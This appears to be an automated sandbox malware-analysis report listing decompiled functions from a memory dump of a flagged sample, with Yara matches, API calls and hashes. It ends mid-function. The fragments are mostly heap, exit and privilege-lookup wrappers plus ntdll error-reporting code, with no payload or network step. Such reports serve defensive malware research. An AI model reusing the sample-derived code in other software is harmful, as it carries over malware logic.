                                                      Function 0041A1F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A1F0(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E0041AB20(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x414c6f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}





                                                      0x0041a207
                                                      0x0041a20c
                                                      0x0041a21d
                                                      0x0041a221

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: oLA
                                                      • API String ID: 1279760036-3789366272
                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction ID: 91a8afe93875cd4dd2c16ce4d21e80b139c6b658c845053945d21e38953d9919
                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction Fuzzy Hash: F1E012B1200208ABDB14EF99DC41EA777ADAF88664F11855ABA085B242C630F910CBB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A1B7, Relevance: 3.1, APIs: 2, Instructions: 57memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 33%
                                                      			E0041A1B7(void* __eflags, intOrPtr _a4, intOrPtr _a8, int _a12, long _a16, void* _a20) {
				intOrPtr _v0;
				char _t17;
				void* _t30;
				void* _t31;
				intOrPtr* _t34;
				void* _t36;

				asm("popad");
				if(__eflags >= 0) {
					es = _t31;
					_pop(_t37);
					if(__eflags < 0) {
						ExitProcess(_a12);
					}
					asm("rcl dword [ebp-0x75], cl");
					_t14 = _a8;
					_push(_t31);
					_t8 = _t14 + 0xc74; // 0xc74
					E0041AB20(_t30, _a8, _t8,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
					_t17 = RtlFreeHeap(_a12, _a16, _a20); // executed
					return _t17;
				} else {
					asm("int1");
					asm("int 0xcb");
					asm("lds edx, [eax-0x741374ab]");
					_t18 = _v0;
					_t3 = _t18 + 0xc6c; // 0xc6e
					_t34 = _t3;
					E0041AB20(_t30, _v0, _t34,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x33);
					return  *((intOrPtr*)( *_t34))(_a4, _a8, _t31, _t36, cs);
				}
			}









                                                      0x0041a1b7
                                                      0x0041a1b8
                                                      0x0041a22b
                                                      0x0041a22c
                                                      0x0041a22d
                                                      0x0041a298
                                                      0x0041a298
                                                      0x0041a22f
                                                      0x0041a233
                                                      0x0041a239
                                                      0x0041a23f
                                                      0x0041a247
                                                      0x0041a25d
                                                      0x0041a261
                                                      0x0041a1ba
                                                      0x0041a1ba
                                                      0x0041a1bb
                                                      0x0041a1be
                                                      0x0041a1c3
                                                      0x0041a1cf
                                                      0x0041a1cf
                                                      0x0041a1d7
                                                      0x0041a1ed
                                                      0x0041a1ed

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 424d4510562c2e4db0df0d0f61624b96989ab3d4dddc571078786a72601b0a29
                                                      • Instruction ID: 185a90659013397bcf8a483a4433d968440831471335218f927fb344ef3f7768
                                                      • Opcode Fuzzy Hash: 424d4510562c2e4db0df0d0f61624b96989ab3d4dddc571078786a72601b0a29
                                                      • Instruction Fuzzy Hash: D601D6B12011046FCB14EFA4DC88DE777A9EF84314F11859AFD1957202D631E915CBE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004082E9, Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 34c5e111d4bfcb5c9815ecdacb22c50f7d4307e97e38cb80680b3eb705e01a22
                                                      • Instruction ID: 3694509a809f9f1e8fa8df973404460a336095567f3c8686c7e1b333279411b5
                                                      • Opcode Fuzzy Hash: 34c5e111d4bfcb5c9815ecdacb22c50f7d4307e97e38cb80680b3eb705e01a22
                                                      • Instruction Fuzzy Hash: AD01D831A803287BE720A6959C43FFE772C6B40F54F04401EFF04BA2C2EAA9691543E9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 88450cfb778f1e1af3d2656188a8999f908b1537f2f8bc008262317800155d5c
                                                      • Instruction ID: 7c0daabbf55dc8e5566c4ca1cfa2da6181a0a9091b78bf2f8488b58e794c74d3
                                                      • Opcode Fuzzy Hash: 88450cfb778f1e1af3d2656188a8999f908b1537f2f8bc008262317800155d5c
                                                      • Instruction Fuzzy Hash: BF01D431A803287BE720A6A58C03FFE762C6B40F54F04401AFF04BA1C1EAA8691542EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A222, Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 5fac00a7328d1cedb1245bfbd6c1f4543ece85e23446dee2f3ee8c2721734e27
                                                      • Instruction ID: 6bf59bb4b1f3a6360bda39897125375e1333038054d9dc861319a4749ef772e1
                                                      • Opcode Fuzzy Hash: 5fac00a7328d1cedb1245bfbd6c1f4543ece85e23446dee2f3ee8c2721734e27
                                                      • Instruction Fuzzy Hash: 7FF0EDB12002047FCB14CFA5CC08EEB7B68EF89360F014A49FD09A7242C231E810CBB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A38B, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 9fe14cfcdc25c2109f35fe76e5fbe089612bf0fa5fddfaa5a0161cc7b3210e93
                                                      • Instruction ID: 8baa55a0811b65819540b6218f605e63180e22f100fb95fe50e3dda7bc1ed5a7
                                                      • Opcode Fuzzy Hash: 9fe14cfcdc25c2109f35fe76e5fbe089612bf0fa5fddfaa5a0161cc7b3210e93
                                                      • Instruction Fuzzy Hash: B2E06DB56002046BDB10DF65CC85EEB3BAAEF856A0F00816AF90997242D931A8158BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A230, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction ID: 9eb97300d5e10087c94d33d02e30a743291ab6cce32cf35ae9b88dc6f9268b02
                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction Fuzzy Hash: 0EE01AB12002046BD714DF59DC45EA777ADAF88754F014559BA0857241C630F910CAB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A382, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: ebdd53004563edd2a4392b4df2e764d5b7b251018413f4144d29ce90c9d72ff3
                                                      • Instruction ID: eadfff77e68cf13cfe6bb92f4c4ca4bc655e7fe4297705652f30da219f738549
                                                      • Opcode Fuzzy Hash: ebdd53004563edd2a4392b4df2e764d5b7b251018413f4144d29ce90c9d72ff3
                                                      • Instruction Fuzzy Hash: 3CE02CB1644200AFDB20DF189C80FEB372D9F81324F028157FE0857242C030B82287BA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A390, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction ID: bf4187e38ed515452a76a24d05e88418ebf87a1f9c5c0c5d517d21230e680a96
                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction Fuzzy Hash: DEE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934F8108BF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A270, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction ID: 654422823446a6dc42c61fec1171b68ac592b5503343b56bfda4b4a103558910
                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction Fuzzy Hash: 1FD017726042187BD620EB99DC85FD777ADDF487A4F0180AABA1C6B242C531BA10CBE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A262, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 8a25ee098a628307becc8e7b60ffaaf770aee037368f891479f304e21f4c3f84
                                                      • Instruction ID: d80e186d900301a896113a0f530628875be0ac6ff1358d6a3f77365f388a9c77
                                                      • Opcode Fuzzy Hash: 8a25ee098a628307becc8e7b60ffaaf770aee037368f891479f304e21f4c3f84
                                                      • Instruction Fuzzy Hash: F9E08CB6A01200BBE621DF14CC98FC33B79EF09368F01819AB9082F651C631BA10CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0115967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c5adaf0183764f90a3f422424c676243194726dcde5c529b50b3a77bf1ea8d1b
                                                      • Instruction ID: b5d9f9d7ee38a516bdb8b471f719d6d3dfb8c480daa21622475a56a15ce461e3
                                                      • Opcode Fuzzy Hash: c5adaf0183764f90a3f422424c676243194726dcde5c529b50b3a77bf1ea8d1b
                                                      • Instruction Fuzzy Hash: 91B02BB19010C9C5DB05D3A00708717390077C0300F12C011D1020640F4738C090F1B2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 011CB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • *** enter .cxr %p for the context, xrefs: 011CB50D
                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 011CB476
                                                      • read from, xrefs: 011CB4AD, 011CB4B2
                                                      • The resource is owned shared by %d threads, xrefs: 011CB37E
                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 011CB47D
                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 011CB484
                                                      • *** then kb to get the faulting stack, xrefs: 011CB51C
                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 011CB305
                                                      • Go determine why that thread has not released the critical section., xrefs: 011CB3C5
                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 011CB314
                                                      • The resource is owned exclusively by thread %p, xrefs: 011CB374
                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 011CB38F
                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 011CB2DC
                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 011CB48F
                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 011CB352
                                                      • *** Inpage error in %ws:%s, xrefs: 011CB418
                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 011CB3D6
                                                      • an invalid address, %p, xrefs: 011CB4CF
                                                      • *** enter .exr %p for the exception record, xrefs: 011CB4F1
                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 011CB53F
                                                      • This failed because of error %Ix., xrefs: 011CB446
                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 011CB39B
                                                      • a NULL pointer, xrefs: 011CB4E0
                                                      • <unknown>, xrefs: 011CB27E, 011CB2D1, 011CB350, 011CB399, 011CB417, 011CB48E
                                                      • write to, xrefs: 011CB4A6
                                                      • The instruction at %p referenced memory at %p., xrefs: 011CB432
                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 011CB323
                                                      • The instruction at %p tried to %s , xrefs: 011CB4B6
                                                      • The critical section is owned by thread %p., xrefs: 011CB3B9
                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 011CB2F3
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                      • API String ID: 0-108210295
                                                      • Opcode ID: 8c05e5124a6ad6b6d55833fec4d7e41cf86856dfd0c7bafd8eb96fe573680b34
                                                      • Instruction ID: 451dd94852f8c58bc25227e83950cae6a84caef713abb224352d57fb29dc89fe
                                                      • Opcode Fuzzy Hash: 8c05e5124a6ad6b6d55833fec4d7e41cf86856dfd0c7bafd8eb96fe573680b34
                                                      • Instruction Fuzzy Hash: FB811535A0C210BFDF2E6A8A9C46E7F7F26AF66AD5F81404CF504AB152E3B18411C776
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011D1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 44%
                                                      			E011D1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x10f48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0111B150();
				} else {
					E0111B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x120589c);
				E0111B150("Heap error detected at %p (heap handle %p)\n",  *0x12058a0);
				_t27 =  *0x1205898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M011D1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0111B150();
				} else {
					E0111B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0111B150("Error code: %d - %s\n",  *0x1205898);
				_t113 =  *0x12058a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0111B150();
					} else {
						E0111B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0111B150("Parameter1: %p\n",  *0x12058a4);
				}
				_t115 =  *0x12058a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0111B150();
					} else {
						E0111B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0111B150("Parameter2: %p\n",  *0x12058a8);
				}
				_t117 =  *0x12058ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0111B150();
					} else {
						E0111B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0111B150("Parameter3: %p\n",  *0x12058ac);
				}
				_t119 =  *0x12058b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0111B150();
					} else {
						E0111B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x12058b4);
					E0111B150("Last known valid blocks: before - %p, after - %p\n",  *0x12058b0);
				} else {
					_t120 =  *0x12058b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0111B150();
				} else {
					E0111B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0111B150("Stack trace available at %p\n", 0x12058c0);
			}











                                                      0x011d1c10
                                                      0x011d1c16
                                                      0x011d1c1e
                                                      0x011d1c3d
                                                      0x011d1c3e
                                                      0x011d1c20
                                                      0x011d1c35
                                                      0x011d1c3a
                                                      0x011d1c44
                                                      0x011d1c55
                                                      0x011d1c5a
                                                      0x011d1c65
                                                      0x011d1c67
                                                      0x00000000
                                                      0x011d1c6e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x011d1c67
                                                      0x011d1cdc
                                                      0x011d1ce5
                                                      0x011d1d04
                                                      0x011d1d05
                                                      0x011d1ce7
                                                      0x011d1cfc
                                                      0x011d1d01
                                                      0x011d1d0b
                                                      0x011d1d17
                                                      0x011d1d1f
                                                      0x011d1d25
                                                      0x011d1d30
                                                      0x011d1d4f
                                                      0x011d1d50
                                                      0x011d1d32
                                                      0x011d1d47
                                                      0x011d1d4c
                                                      0x011d1d61
                                                      0x011d1d67
                                                      0x011d1d68
                                                      0x011d1d6e
                                                      0x011d1d79
                                                      0x011d1d98
                                                      0x011d1d99
                                                      0x011d1d7b
                                                      0x011d1d90
                                                      0x011d1d95
                                                      0x011d1daa
                                                      0x011d1db0
                                                      0x011d1db1
                                                      0x011d1db7
                                                      0x011d1dc2
                                                      0x011d1de1
                                                      0x011d1de2
                                                      0x011d1dc4
                                                      0x011d1dd9
                                                      0x011d1dde
                                                      0x011d1df3
                                                      0x011d1df9
                                                      0x011d1dfa
                                                      0x011d1e00
                                                      0x011d1e0a
                                                      0x011d1e13
                                                      0x011d1e32
                                                      0x011d1e33
                                                      0x011d1e15
                                                      0x011d1e2a
                                                      0x011d1e2f
                                                      0x011d1e39
                                                      0x011d1e4a
                                                      0x011d1e02
                                                      0x011d1e02
                                                      0x011d1e08
                                                      0x00000000
                                                      0x00000000
                                                      0x011d1e08
                                                      0x011d1e5b
                                                      0x011d1e7a
                                                      0x011d1e7b
                                                      0x011d1e5d
                                                      0x011d1e72
                                                      0x011d1e77
                                                      0x011d1e95

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                      • API String ID: 0-2897834094
                                                      • Opcode ID: ae8a532eb8a173fd4c895f104cb9378cb335b241ac023642e4401121df4bd698
                                                      • Instruction ID: 813b883fdd4f3cd5b8cd598e073c5fa134f4c130f1db698bf14613be53bd2858
                                                      • Opcode Fuzzy Hash: ae8a532eb8a173fd4c895f104cb9378cb335b241ac023642e4401121df4bd698
                                                      • Instruction Fuzzy Hash: 6561E936916545EFD61FAB4AF589E24B3B4EB08930B0F843EF9096B341D7749C808F0A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01123D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E01123D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01121B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01121B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01121B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01121B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01121B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
